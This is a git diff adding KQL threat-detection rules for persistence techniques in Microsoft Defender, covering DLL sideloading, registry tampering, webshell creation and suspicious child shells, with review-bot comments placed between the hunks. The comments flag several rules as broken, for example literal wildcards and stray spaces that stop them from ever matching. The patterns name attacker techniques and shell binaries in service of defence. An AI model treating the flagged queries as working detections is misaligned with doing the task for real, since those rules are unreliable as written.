+// Description: Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths*" and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\SysWOW64\\explorer.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_visual_studio_tools_for_office.kql b/KQL/rules/Persistence/potential_persistence_via_visual_studio_tools_for_office.kql
new file mode 100644
index 00000000..53e07333
--- /dev/null
+++ b/KQL/rules/Persistence/potential_persistence_via_visual_studio_tools_for_office.kql
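Review bot: `RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths*"` contains a literal asterisk inherited from the Sigma wildcard, so it never matches and the TypedPaths rule is dead. The `url1`, `url2`… entries are values on the TypedPaths key and surface in `RegistryValueName`, so the condition should simply be `RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths"`. The explorer.exe exclusion is a sound absolute-path allow-list and can stay as is.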
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Visual Studio Tools for Office
+// Author: Bhabesh Raj
+// Date: 2021-01-10
+// Level: medium
+// Description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.
+// MITRE Tactic: Persistence
+// Tags: attack.t1137.006, attack.persistence
+// False Positives:
+// - Legitimate Addin Installation
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Software\\Microsoft\\Office\\Outlook\\Addins*" or RegistryKey endswith "\\Software\\Microsoft\\Office\\Word\\Addins*" or RegistryKey endswith "\\Software\\Microsoft\\Office\\Excel\\Addins*" or RegistryKey endswith "\\Software\\Microsoft\\Office\\Powerpoint\\Addins*" or RegistryKey endswith "\\Software\\Microsoft\\VSTO\\Security\\Inclusion*") and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe")) or ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\Integrator.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\Teams.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\OFFICE" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\OFFICE" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\Root\\OFFICE" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files (x86)\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\")) or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe", "C:\\Windows\\System32\\regsvr32.exe", "C:\\Windows\\SysWOW64\\regsvr32.exe"))))) and (not((((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Avast Software\\Avast\\RegSvr.exe", "C:\\Program Files (x86)\\Avast Software\\Avast\\RegSvr.exe")) and RegistryKey endswith "\\Microsoft\\Office\\Outlook\\Addins\\Avast.AsOutExt*") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe", "C:\\Program Files (x86)\\AVG\\Antivirus\\RegSvr.exe")) and RegistryKey endswith "\\Microsoft\\Office\\Outlook\\Addins\\Antivirus.AsOutExt*"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_privilege_escalation_via_service_permissions_weakness.kql b/KQL/rules/Persistence/potential_privilege_escalation_via_service_permissions_weakness.kql
new file mode 100644
index 00000000..b7e27451
--- /dev/null
+++ b/KQL/rules/Persistence/potential_privilege_escalation_via_service_permissions_weakness.kql
@@ -0,0 +1,10 @@
+// Title: Potential Privilege Escalation via Service Permissions Weakness
+// Author: Teymur Kheirkhabarov
+// Date: 2019-10-26
+// Level: high
+// Description: Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\ImagePath" or ProcessCommandLine contains "\\FailureCommand" or ProcessCommandLine contains "\\ServiceDll") and (ProcessCommandLine contains "ControlSet" and ProcessCommandLine contains "services") and (ProcessIntegrityLevel in~ ("Medium", "S-1-16-8192"))
\ No newline at end of file
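Review bot: Every key test in the VSTO rule's main condition ends in a literal `*` (`"...\\Outlook\\Addins*"`, `"...\\VSTO\\Security\\Inclusion*"`), as do the Avast/AVG exclusions (`"...\\Avast.AsOutExt*"`), so none of them can match and the rule is inert despite its long allow-list. Replace each `endswith "...*"` with a substring match on the directory form, e.g. `RegistryKey contains "\\Software\\Microsoft\\Office\\Outlook\\Addins\\"` for the five targets and `RegistryKey contains "\\Microsoft\\Office\\Outlook\\Addins\\Avast.AsOutExt"` for the vendor filters. The same literal-wildcard residue appears in several other registry rules in this patch, so it looks like a systematic translation defect for Sigma `endswith` values that carry a trailing wildcard and is best fixed once in the conversion step rather than file by file.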
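Review bot: The service-permissions description speaks of registry modification, but the query reads `DeviceProcessEvents.ProcessCommandLine`, so it only sees edits made through a command line that spells out the key (reg.exe and similar) and misses API-based writes, PowerShell `Set-ItemProperty` with the path in a variable, or any tool that reads its target from a file. DeviceRegistryEvents carries the writer's integrity level, so the registry-side form is closer to the stated intent: `DeviceRegistryEvents | where RegistryKey contains "ControlSet" and RegistryKey contains "\\services\\" and RegistryValueName in~ ("ImagePath", "FailureCommand", "ServiceDll") and InitiatingProcessIntegrityLevel =~ "Medium"` (verify the column name against your schema). If the command-line variant is kept for coverage of reg.exe, the `"S-1-16-8192"` entry in the `in~` list is harmless but dead as far as I have seen — MDE reports the level by name — and the filename in the `Persistence` folder suggests the rule should at least be tagged with what it really observes.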
diff --git a/KQL/rules/Persistence/potential_qakbot_registry_activity.kql b/KQL/rules/Persistence/potential_qakbot_registry_activity.kql
new file mode 100644
index 00000000..4bffdbfa
--- /dev/null
+++ b/KQL/rules/Persistence/potential_qakbot_registry_activity.kql
@@ -0,0 +1,10 @@
+// Title: Potential Qakbot Registry Activity
+// Author: Hieu Tran
+// Date: 2023-03-13
+// Level: high
+// Description: Detects a registry key used by IceID in a campaign that distributes malicious OneNote files
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Software\\firm\\soft\\Name"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_rcdll_dll_sideloading.kql b/KQL/rules/Persistence/potential_rcdll_dll_sideloading.kql
new file mode 100644
index 00000000..57dcb81d
--- /dev/null
+++ b/KQL/rules/Persistence/potential_rcdll_dll_sideloading.kql
@@ -0,0 +1,10 @@
+// Title: Potential Rcdll.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-03-13
+// Level: high
+// Description: Detects potential DLL sideloading of rcdll.dll
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\rcdll.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_default_location.kql b/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_default_location.kql
new file mode 100644
index 00000000..59111e2b
--- /dev/null
+++ b/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_default_location.kql
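Review bot: The title says "Qakbot" while the description attributes the `\\Software\\firm\\soft\\Name` key to "IceID"; one of them is wrong, and an analyst triaging the alert will not know which family to pivot on. Pick the attribution the indicator actually belongs to and make the two lines agree — e.g. `// Description: Detects a registry key used by Qakbot in a campaign that distributes malicious OneNote files` — or rename the rule if IceID is correct. A bare `RegistryKey endswith` with no `ActionType` also fires on the key's deletion during remediation; `ActionType in ("RegistryKeyCreated", "RegistryValueSet")` restricts it to the persistence write.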
@@ -0,0 +1,10 @@
+// Title: Potential RjvPlatform.DLL Sideloading From Default Location
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-09
+// Level: medium
+// Description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\SystemResetPlatform\\SystemResetPlatform.exe" and FolderPath =~ "C:\\$SysReset\\Framework\\Stack\\RjvPlatform.dll"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_non_default_location.kql b/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_non_default_location.kql
new file mode 100644
index 00000000..be764d08
--- /dev/null
+++ b/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_non_default_location.kql
@@ -0,0 +1,12 @@
+// Title: Potential RjvPlatform.DLL Sideloading From Non-Default Location
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-09
+// Level: high
+// Description: Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where (InitiatingProcessFolderPath =~ "\\SystemResetPlatform.exe" and FolderPath endswith "\\RjvPlatform.dll") and (not(InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\SystemResetPlatform\\"))
\ No newline at end of file
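Review bot: In the non-default-location rule, `InitiatingProcessFolderPath =~ "\\SystemResetPlatform.exe"` is an equality test against a bare file name with a leading backslash, so it can never equal a full image path and the rule cannot fire. It should read `InitiatingProcessFolderPath endswith "\\SystemResetPlatform.exe"`; the `not(InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\SystemResetPlatform\\")` exclusion then does the real work of separating the legitimate binary from a copy placed elsewhere. The companion default-location rule above it uses `=~` correctly because both operands there are full paths.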
diff --git a/KQL/rules/Persistence/potential_roboform_dll_sideloading.kql b/KQL/rules/Persistence/potential_roboform_dll_sideloading.kql
new file mode 100644
index 00000000..88e63fc1
--- /dev/null
+++ b/KQL/rules/Persistence/potential_roboform_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential RoboForm.DLL Sideloading
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-14
+// Level: medium
+// Description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - If installed on a per-user level, the path would be located in "AppData\Local". Add additional filters to reflect this mode of installation
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\roboform.dll" or FolderPath endswith "\\roboform-x64.dll") and (not(((InitiatingProcessFolderPath endswith "\\robotaskbaricon.exe" or InitiatingProcessFolderPath endswith "\\robotaskbaricon-x64.exe") and (InitiatingProcessFolderPath startswith " C:\\Program Files (x86)\\Siber Systems\\AI RoboForm\\" or InitiatingProcessFolderPath startswith " C:\\Program Files\\Siber Systems\\AI RoboForm\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_sentinelone_shell_context_menu_scan_command_tampering.kql b/KQL/rules/Persistence/potential_sentinelone_shell_context_menu_scan_command_tampering.kql
new file mode 100644
index 00000000..647717f9
--- /dev/null
+++ b/KQL/rules/Persistence/potential_sentinelone_shell_context_menu_scan_command_tampering.kql
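Review bot: Both path prefixes in the RoboForm exclusion have a leading space inside the string literal — `startswith " C:\\Program Files (x86)\\Siber Systems\\AI RoboForm\\"` — so the exclusion never matches and every load of roboform.dll by the legitimate robotaskbaricon.exe under Program Files will alert, turning a "medium" rule into a flood on any host with the product. Strip the space: `InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Siber Systems\\AI RoboForm\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Siber Systems\\AI RoboForm\\"`. A quick grep of the rule set for `" ` immediately after `startswith`/`endswith`/`contains` is worthwhile, since a stray space in a path literal is invisible in review and silent at query time.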
@@ -0,0 +1,10 @@
+// Title: Potential SentinelOne Shell Context Menu Scan Command Tampering
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-03-06
+// Level: medium
+// Description: Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\shell\\SentinelOneScan\\command*" and (not(((InitiatingProcessFolderPath endswith "C:\\Program Files\\SentinelOne\\" or InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\SentinelOne\\") or (RegistryValueData contains "\\SentinelScanFromContextMenu.exe" and (RegistryValueData startswith "C:\\Program Files\\SentinelOne\\Sentinel Agent" or RegistryValueData startswith "C:\\Program Files (x86)\\SentinelOne\\Sentinel Agent")))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_shelldispatch_dll_sideloading.kql b/KQL/rules/Persistence/potential_shelldispatch_dll_sideloading.kql
new file mode 100644
index 00000000..7211edc2
--- /dev/null
+++ b/KQL/rules/Persistence/potential_shelldispatch_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential ShellDispatch.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-20
+// Level: medium
+// Description: Detects potential DLL sideloading of "ShellDispatch.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Some installers may trigger some false positives
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\ShellDispatch.dll" and (not(((FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Temp\\") or FolderPath contains ":\\Windows\\Temp\\")))
\ No newline at end of file
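Review bot: In the SentinelOne rule, `RegistryKey endswith "\\shell\\SentinelOneScan\\command*"` treats the `*` as a literal character, so a key that actually ends in `\command` does not match; the trailing wildcard from the source rule should become `RegistryKey contains "\\shell\\SentinelOneScan\\command"` (or `endswith` without the `*`). In the same where clause, `InitiatingProcessFolderPath endswith "C:\\Program Files\\SentinelOne\\"` can never hold for an image path that ends in an executable name — it reads as a `startswith` on the vendor directory, like the `RegistryValueData startswith` terms beside it. As written, the exclusion is dead and the rule would fire on SentinelOne's own agent updates.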
diff --git a/KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql b/KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql
new file mode 100644
index 00000000..6f4c3d7e
--- /dev/null
+++ b/KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Shim Database Persistence via Sdbinst.EXE
+// Author: Markus Neis
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects installation of a new shim using sdbinst.exe.
+Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.011
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".sdb" and (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe")) and (not(((ProcessCommandLine contains ":\\Program Files (x86)\\IIS Express\\iisexpressshim.sdb" or ProcessCommandLine contains ":\\Program Files\\IIS Express\\iisexpressshim.sdb") and InitiatingProcessFolderPath endswith "\\msiexec.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_smadhook_dll_sideloading.kql b/KQL/rules/Persistence/potential_smadhook_dll_sideloading.kql
new file mode 100644
index 00000000..ce441f53
--- /dev/null
+++ b/KQL/rules/Persistence/potential_smadhook_dll_sideloading.kql
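Review bot: The description's second line, `+Adversaries may establish persistence and/or elevate privileges ...`, has no `//` prefix, so the generated .kql is not a valid query — the parser sees a bare statement ahead of `DeviceProcessEvents`. Every continuation line of a multi-line description needs a `// ` prefix (or the description should be folded onto one line); the converter apparently only prefixes the first line. The same unprefixed continuation appears later in this patch in both desktop-background-change rules (Reg.EXE and registry variants) and in the Process Explorer driver creation rule.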
@@ -0,0 +1,12 @@
+// Title: Potential SmadHook.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-01
+// Level: high
+// Description: Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\SmadHook32c.dll" or FolderPath endswith "\\SmadHook64c.dll") and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files (x86)\\SMADAV\\SmadavProtect64.exe", "C:\\Program Files\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files\\SMADAV\\SmadavProtect64.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\SMADAV\\" or FolderPath startswith "C:\\Program Files\\SMADAV\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_solidpdfcreator_dll_sideloading.kql b/KQL/rules/Persistence/potential_solidpdfcreator_dll_sideloading.kql
new file mode 100644
index 00000000..b60ddd2d
--- /dev/null
+++ b/KQL/rules/Persistence/potential_solidpdfcreator_dll_sideloading.kql
@@ -0,0 +1,10 @@
+// Title: Potential SolidPDFCreator.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-05-07
+// Level: medium
+// Description: Detects potential DLL sideloading of "SolidPDFCreator.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\SolidPDFCreator.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\SolidDocuments\\SolidPDFCreator\\" or FolderPath startswith "C:\\Program Files\\SolidDocuments\\SolidPDFCreator\\") and InitiatingProcessFolderPath endswith "\\SolidPDFCreator.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_suspicious_powershell_module_file_created.kql b/KQL/rules/Persistence/potential_suspicious_powershell_module_file_created.kql
new file mode 100644
index 00000000..ce854186
--- /dev/null
+++ b/KQL/rules/Persistence/potential_suspicious_powershell_module_file_created.kql
@@ -0,0 +1,12 @@
+// Title: Potential Suspicious PowerShell Module File Created
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-09
+// Level: medium
+// Description: Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legitimate modules often includes a version folder.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - False positive rate will vary depending on the environments. Additional filters might be required to make this logic usable in production.
+
+DeviceFileEvents
+| where (FolderPath contains "\\WindowsPowerShell\\Modules\\" and FolderPath contains "\\.ps") or (FolderPath contains "\\WindowsPowerShell\\Modules\\" and FolderPath contains "\\.dll")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_suspicious_registry_file_imported_via_reg_exe.kql b/KQL/rules/Persistence/potential_suspicious_registry_file_imported_via_reg_exe.kql
new file mode 100644
index 00000000..34910143
--- /dev/null
+++ b/KQL/rules/Persistence/potential_suspicious_registry_file_imported_via_reg_exe.kql
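Review bot: `FolderPath contains "\\.ps"` requires a backslash immediately followed by `.ps`, i.e. a path component that starts with a dot, so a module laid out as `\Modules\malware\malware.psm1` — the exact shape the description names — does not match, and the same holds for `"\\.dll"`. If the intent is an extension check, `FolderPath endswith ".psm1"` / `".psd1"` / `".ps1"` / `".dll"` is what the description implies, and the duplicated `FolderPath contains "\\WindowsPowerShell\\Modules\\"` can then be factored out of both branches. The original pattern is not visible here, so confirm against the source rule before changing it.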
@@ -0,0 +1,12 @@
+// Title: Potential Suspicious Registry File Imported Via Reg.EXE
+// Author: frack113, Nasreddine Bencherchali
+// Date: 2022-08-01
+// Level: medium
+// Description: Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1112, attack.defense-evasion
+// False Positives:
+// - Legitimate import of keys
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " import " and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "C:\\Users\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\" or ProcessCommandLine contains "C:\\ProgramData\\")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql b/KQL/rules/Persistence/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql
new file mode 100644
index 00000000..4c732da6
--- /dev/null
+++ b/KQL/rules/Persistence/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential Tampering With RDP Related Registry Keys Via Reg.EXE
+// Author: pH-T (Nextron Systems), @Kostastsale, TheDFIRReport
+// Date: 2022-02-12
+// Level: high
+// Description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.lateral-movement, attack.t1021.001, attack.t1112
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " add " and ProcessCommandLine contains "\\CurrentControlSet\\Control\\Terminal Server" and ProcessCommandLine contains "REG_DWORD" and ProcessCommandLine contains " /f") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and ((ProcessCommandLine contains "Licensing Core" and ProcessCommandLine contains "EnableConcurrentSessions") or (ProcessCommandLine contains "WinStations\\RDP-Tcp" or ProcessCommandLine contains "MaxInstanceCount" or ProcessCommandLine contains "fEnableWinStation" or ProcessCommandLine contains "TSUserEnabled" or ProcessCommandLine contains "TSEnabled" or ProcessCommandLine contains "TSAppCompat" or ProcessCommandLine contains "IdleWinStationPoolCount" or ProcessCommandLine contains "TSAdvertise" or ProcessCommandLine contains "AllowTSConnections" or ProcessCommandLine contains "fSingleSessionPerUser" or ProcessCommandLine contains "fDenyTSConnections"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_vivaldi_elf_dll_sideloading.kql b/KQL/rules/Persistence/potential_vivaldi_elf_dll_sideloading.kql
new file mode 100644
index 00000000..724c5d35
--- /dev/null
+++ b/KQL/rules/Persistence/potential_vivaldi_elf_dll_sideloading.kql
@@ -0,0 +1,10 @@
+// Title: Potential Vivaldi_elf.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-08-03
+// Level: medium
+// Description: Detects potential DLL sideloading of "vivaldi_elf.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\vivaldi_elf.dll" and (not((FolderPath contains "\\Vivaldi\\Application\\" and InitiatingProcessFolderPath endswith "\\Vivaldi\\Application\\vivaldi.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_waveedit_dll_sideloading.kql b/KQL/rules/Persistence/potential_waveedit_dll_sideloading.kql
new file mode 100644
index 00000000..4c5051ad
--- /dev/null
+++ b/KQL/rules/Persistence/potential_waveedit_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential Waveedit.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-14
+// Level: high
+// Description: Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\waveedit.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe", "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\" or FolderPath startswith "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_webshell_creation_on_static_website.kql b/KQL/rules/Persistence/potential_webshell_creation_on_static_website.kql
new file mode 100644
index 00000000..3edd1ca6
--- /dev/null
+++ b/KQL/rules/Persistence/potential_webshell_creation_on_static_website.kql
@@ -0,0 +1,12 @@
+// Title: Potential Webshell Creation On Static Website
+// Author: Beyu Denis, oscd.community, Tim Shelton, Thurein Oo
+// Date: 2019-10-22
+// Level: medium
+// Description: Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003
+// False Positives:
+// - Legitimate administrator or developer creating legitimate executable files in a web application folder
+
+DeviceFileEvents
+| where (((FolderPath contains ".ashx" or FolderPath contains ".asp" or FolderPath contains ".ph" or FolderPath contains ".soap") and FolderPath contains "\\inetpub\\wwwroot\\") or (FolderPath contains ".ph" and (FolderPath contains "\\www\\" or FolderPath contains "\\htdocs\\" or FolderPath contains "\\html\\"))) and (not((FolderPath contains "\\xampp" or InitiatingProcessFolderPath =~ "System" or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Windows\\Temp\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_wwlib_dll_sideloading.kql b/KQL/rules/Persistence/potential_wwlib_dll_sideloading.kql
new file mode 100644
index 00000000..0c027af5
--- /dev/null
+++ b/KQL/rules/Persistence/potential_wwlib_dll_sideloading.kql
@@ -0,0 +1,10 @@
+// Title: Potential WWlib.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-05-18
+// Level: medium
+// Description: Detects potential DLL sideloading of "wwlib.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\wwlib.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\") and InitiatingProcessFolderPath endswith "\\winword.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potentially_suspicious_child_process_of_keyscrambler_exe.kql b/KQL/rules/Persistence/potentially_suspicious_child_process_of_keyscrambler_exe.kql
new file mode 100644
index 00000000..d746f12d
--- /dev/null
+++ b/KQL/rules/Persistence/potentially_suspicious_child_process_of_keyscrambler_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Child Process of KeyScrambler.exe
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-05-13
+// Level: medium
+// Description: Detects potentially suspicious child processes of KeyScrambler.exe
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1203, attack.t1574.001
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\KeyScrambler.exe"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql b/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql
new file mode 100644
index 00000000..0a3db4bb
--- /dev/null
+++ b/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql
@@ -0,0 +1,14 @@
+// Title: Potentially Suspicious Desktop Background Change Using Reg.EXE
+// Author: Stephen Lincoln @slincoln-aiq (AttackIQ)
+// Date: 2023-12-21
+// Level: medium
